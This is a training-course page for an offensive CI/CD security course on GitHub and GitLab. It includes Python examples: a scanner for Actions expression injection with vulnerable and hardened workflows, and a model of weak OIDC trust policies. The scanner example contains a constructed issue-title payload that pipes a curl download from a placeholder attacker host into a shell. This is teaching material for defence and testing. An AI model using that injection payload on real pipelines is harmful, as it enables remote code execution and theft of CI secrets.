
Offensive CI/CD (Intermediate) - 2 days - €2500 excl. VAT

Description

Continuous Integration and Continuous Delivery (CI/CD) platforms have become the backbone of modern software development. Because developers rely on them to build, test, and deploy applications, and because they hold the credentials needed to do so, these platforms have turned into highly critical targets. Understanding how these environments get compromised, and how to secure them, is now a central concern for defenders and attackers alike.

Over this two-day course, participants work through a complete offensive methodology against the two most widely used CI/CD platforms: GitHub and GitLab. The training is split into two modules, one per platform, covering architectural concepts, pipeline abuse, runner hijacking, and post-exploitation. In realistic corporate environments, attendees practise complete kill chains, from unauthenticated repository access via pipeline injection to full organizational compromise and secrets extraction.

  • 2 days (14 hours)

  • 2 intense course modules following realistic CI/CD intrusion steps

  • Dedicated corporate environments simulating complex GitHub and GitLab organizations

  • Deep dive into real-world vulnerabilities and custom exploitation tools

Objectives

  • Understand the architecture and security challenges of modern CI/CD environments (GitHub and GitLab)
  • Identify and exploit critical weaknesses in pipeline definitions, untrusted inputs, and runner configurations
  • Extract sensitive secrets and abuse OIDC configurations to pivot towards cloud environments
  • Perform a realistic intrusion simulation, from initial access to advanced post-exploitation

Public and prerequisites

This training is aimed at people with a basic grounding in offensive security who want to understand how CI/CD environments are attacked and secured. It is intended primarily for pentesters, DevSecOps engineers, system administrators, and security architects, but also for any technical profile wishing to add a cloud/CI security component to their skill set.

  • Pentesters / Red Teamers

  • DevOps / DevSecOps engineers

  • System administrators

  • Security architects

Fluent UNIX/Linux skills, solid networking basics, and an interest in offensive security are highly recommended.

Content

Day 1: GitHub

  • Architecture & IAM: core concepts of GitHub organizations, repositories, and identity management (users, agents, and GitHub Apps).
  • Authentication & Authorization: Personal Access Tokens (PAT) and scopes, SSH keys, and the roles/ACL system (who can create branches, commit, merge, or read logs).
  • Pipelines: GitHub Actions internals, YAML definitions, available modules, and variable stores (managing secrets and the implications of protected branches).
  • Pipeline Exploitation: injecting malicious code via untrusted inputs, expression injections, dangerous artifacts, and environment manipulation; supply chain vectors such as repo jacking and Dependabot abuse.
  • Runners & OIDC: hosted vs. self-hosted runners; runner architecture, registration, and hijacking techniques; OIDC internals, token generation, and the exploitation of weak claim bindings.
  • Tooling & Automation: octoscan for static vulnerability analysis of workflows, and nord-stream for automated CI/CD secret extraction.
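As an added illustration of the "Pipeline Exploitation" item above (example code written for this page, not course material and not octoscan itself), the script below shows the classic GitHub Actions expression injection: an expression such as ${{ github.event.issue.title }} placed inside a run: script is substituted textually by the runner before the shell parses the script, so an issue title containing shell metacharacters becomes shell code. The script embeds two constructed workflows (a vulnerable one and its hardened form, where the value travels through env and the shell expands "$TITLE" as data), a small line-based scanner that reports untrusted context references inside run: scripts, and a render() function that reproduces the runner's substitution to show what the shell actually receives. The list of untrusted contexts is a hand-picked subset, not an exhaustive one, and the attacker URL is a placeholder.

```python
import re
from typing import Dict, List, Tuple

# Expression contexts whose value is chosen by whoever opens the issue/PR/comment or
# authors the commit, i.e. by people who need no write access to the workflow file.
# Hand-picked subset for this example, not an exhaustive list.
UNTRUSTED = (
    "github.event.issue.title", "github.event.issue.body",
    "github.event.pull_request.title", "github.event.pull_request.body",
    "github.event.pull_request.head.ref", "github.event.pull_request.head.label",
    "github.event.pull_request.head.repo.default_branch",
    "github.event.comment.body", "github.event.review.body",
    "github.event.review_comment.body",
    "github.event.head_commit.message", "github.event.head_commit.author.name",
    "github.event.head_commit.author.email", "github.event.commits",
    "github.event.discussion.title", "github.event.discussion.body",
    "github.event.workflow_run.head_branch", "github.event.workflow_run.head_commit.message",
    "github.head_ref",
)

EXPR = re.compile(r"\$\{\{(.*?)\}\}", re.S)                              # ${{ ... }}
CONTEXT_REF = re.compile(r"github(?:\.[A-Za-z_][\w-]*|\[[^\]]*\])+")   # github.event.commits[0].message


def is_untrusted(ref: str) -> bool:
    return any(ref == p or ref.startswith(p + ".") or ref.startswith(p + "[") for p in UNTRUSTED)


def run_scripts(workflow: str) -> List[Tuple[int, str]]:
    """(1-based line of the `run:` key, script text) for every step script.
    Handles inline scalars and `|`/`>` block scalars with a line-based walk;
    enough for workflow files, not a general YAML parser."""
    lines = workflow.splitlines()
    out, i = [], 0
    while i < len(lines):
        m = re.match(r"^(\s*)(-\s+)?run:\s*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        key_col = len(m.group(1)) + len(m.group(2) or "")   # column of the `run` key
        line_no, rest = i + 1, m.group(3).strip()
        if rest in ("|", ">", "|-", ">-", "|+", ">+"):
            body, i = [], i + 1
            # block scalar content is indented deeper than the key; siblings (env:, uses:) are not
            while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > key_col):
                body.append(lines[i])
                i += 1
            out.append((line_no, "\n".join(body)))
        else:
            out.append((line_no, rest))
            i += 1
    return out


def find_injections(workflow: str) -> List[Tuple[int, str]]:
    """Untrusted context references interpolated into a run: script.
    Conservative: a reference inside contains()/startsWith() is reported too."""
    findings = []
    for line_no, script in run_scripts(workflow):
        for expr in EXPR.findall(script):
            for ref in CONTEXT_REF.findall(expr):
                if is_untrusted(ref):
                    findings.append((line_no, ref))
    return findings


def render(script: str, context: Dict[str, str]) -> str:
    """What the runner does: substitute each expression textually *before* the
    shell parses the script. No quoting, no escaping."""
    return EXPR.sub(lambda m: context.get(m.group(1).strip(), ""), script)


# Constructed sample: an issue-triage workflow with the classic mistake.
VULNERABLE = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Greet
        run: |
          echo "New issue: ${{ github.event.issue.title }}"
      - run: echo "${{ github.event.issue.body }}" > body.txt
"""

# Same workflow, fixed: the value goes through an environment variable and the
# shell expands "$TITLE" as a single word, so metacharacters in the title stay inert.
HARDENED = """\
name: triage
on:
  issues:
    types: [opened]
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Greet
        env:
          TITLE: ${{ github.event.issue.title }}
          BODY: ${{ github.event.issue.body }}
        run: |
          echo "New issue: $TITLE"
          printf '%s\\n' "$BODY" > body.txt
"""

MALICIOUS_TITLE = '"; curl -s https://attacker.invalid/x | sh; echo "'   # constructed payload


def demo() -> dict:
    vuln_script = run_scripts(VULNERABLE)[0][1]
    return {
        "vulnerable_findings": find_injections(VULNERABLE),
        "hardened_findings": find_injections(HARDENED),
        # the exact text bash receives once the runner has expanded the expression
        "shell_sees": render(vuln_script, {"github.event.issue.title": MALICIOUS_TITLE}),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

The rendered command shows why quoting inside the workflow does not help: the injected value closes the double quotes itself, and the rest of the title runs as its own command. The scanner is deliberately minimal; octoscan works on the parsed workflow and covers further patterns (pull_request_target checkouts, unpinned actions, artifact handling) that this example does not.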

Day 2: GitLab

  • Architecture & ACLs: GitLab-specific project and group hierarchies and their permission model.
  • Authentication Mechanisms: user/password flows, Personal Access Tokens (PAT) and scopes, SSH keys, and external identity providers.
  • Pipelines: GitLab CI/CD YAML configuration, CI-specific environment variables, and the security implications of protected variables and protected branches.
  • Runner Implementation & Hijacking: runner registration, authentication, filesystem layout, and executors (Shell, Docker, Kubernetes); techniques to hijack, abuse, and pivot from runners (persistence, runner identity theft, Docker-in-Docker exploitation).
  • Post-Exploitation: interacting with the GitLab Rails console, advanced secret extraction, and reading repositories directly from the underlying filesystem.
  • Defense & Operations: analyzing pipeline logs, identifying security alerts, and tracking malicious CI/CD activity.
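The weak OIDC claim bindings listed under Day 1 (Runners & OIDC) and the cloud pivot named in the objectives apply to both platforms, since GitHub Actions and GitLab CI can each mint an OIDC ID token that a cloud provider exchanges for short-lived credentials. The Python below is an added example written for this page (not course material): it builds the sub claim each platform places in such a token and evaluates it against AWS-IAM-style StringEquals / StringLike trust conditions. The policy evaluation is a simplified model written here (one pattern per key, no negated operators), and the organisation, repository and policy names are made up.

```python
import fnmatch
from typing import Dict, Optional

# Subject ("sub") claim formats each platform puts in a job's OIDC token.
# GitHub (issuer token.actions.githubusercontent.com), default formats:
#   repo:<owner>/<repo>:ref:refs/heads/<branch>   push / workflow_dispatch on a branch
#   repo:<owner>/<repo>:pull_request              pull_request trigger
#   repo:<owner>/<repo>:environment:<name>        job bound to an environment
# GitLab (id_tokens: keyword), default format:
#   project_path:<group>/<project>:ref_type:branch:ref:<branch>

ISS = "token.actions.githubusercontent.com"


def github_sub(owner: str, repo: str, *, branch: Optional[str] = None,
               environment: Optional[str] = None, pull_request: bool = False) -> str:
    base = f"repo:{owner}/{repo}"
    if environment:
        return f"{base}:environment:{environment}"
    if pull_request:
        return f"{base}:pull_request"
    return f"{base}:ref:refs/heads/{branch}"


def gitlab_sub(project_path: str, branch: str) -> str:
    return f"project_path:{project_path}:ref_type:branch:ref:{branch}"


def policy_accepts(conditions: Dict[str, Dict[str, str]], claims: Dict[str, str]) -> bool:
    """Evaluate a trust-policy style Condition block against token claims.
    Simplified model of AWS IAM semantics: every key of every operator must match;
    StringLike honours '*' and '?' (fnmatch, '*' also crosses '/' and ':')."""
    for op, kvs in conditions.items():
        for key, pattern in kvs.items():
            value = claims.get(key)
            if value is None:
                return False
            if op == "StringEquals" and value != pattern:
                return False
            if op == "StringLike" and not fnmatch.fnmatchcase(value, pattern):
                return False
    return True


def claims(sub: str, aud: str = "sts.amazonaws.com") -> Dict[str, str]:
    return {f"{ISS}:sub": sub, f"{ISS}:aud": aud}


# Made-up trust policies for a hypothetical deploy role.
# Weak: any repository in the organisation, any ref, any trigger.
WEAK = {"StringLike": {f"{ISS}:sub": "repo:acme/*"}}
# Still weak: the right repository, but every ref and the pull_request trigger.
REPO_WILDCARD = {"StringLike": {f"{ISS}:sub": "repo:acme/prod-deploy:*"}}
# Pinned: exact repository, exact branch, audience checked.
STRICT = {"StringEquals": {f"{ISS}:aud": "sts.amazonaws.com",
                           f"{ISS}:sub": "repo:acme/prod-deploy:ref:refs/heads/main"}}


def demo() -> Dict[str, bool]:
    legit = claims(github_sub("acme", "prod-deploy", branch="main"))
    sandbox = claims(github_sub("acme", "sandbox", branch="feature"))    # any other org repo
    pr = claims(github_sub("acme", "prod-deploy", pull_request=True))     # any PR to the repo
    return {
        "weak/legit": policy_accepts(WEAK, legit),
        "weak/sandbox": policy_accepts(WEAK, sandbox),            # sandbox pipeline gets the prod role
        "repo_wildcard/pr": policy_accepts(REPO_WILDCARD, pr),    # unreviewed PR branch gets the role
        "strict/sandbox": policy_accepts(STRICT, sandbox),
        "strict/pr": policy_accepts(STRICT, pr),
        "strict/legit": policy_accepts(STRICT, legit),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:18} {v}")
```

A StringLike pattern on the organisation, on the repository with a trailing wildcard, or on a branch prefix such as refs/heads/release-* hands the role to anyone able to run a pipeline in a matching repository or create a matching branch; the same holds for a GitLab binding on project_path:acme/*. The defensible binding pins the exact repository and ref (or a protected environment), checks aud, and relies on branch protection so that the pinned ref cannot be pushed to by an arbitrary contributor.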

All the details regarding how the training is conducted are described on this page.